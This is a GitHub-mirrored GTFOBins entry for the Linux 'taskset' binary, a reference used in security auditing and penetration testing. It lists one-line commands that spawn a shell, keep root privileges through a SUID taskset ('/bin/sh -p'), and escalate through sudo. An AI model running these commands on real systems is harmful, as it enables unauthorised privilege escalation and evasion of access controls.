1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00
2018-10-05 18:55:38 +01:00

10 lines
144 B
Markdown

---
functions:
shell:
- code: taskset 1 /bin/sh
suid:
- code: ./taskset 1 /bin/sh -p
sudo:
- code: sudo taskset 1 /bin/sh
---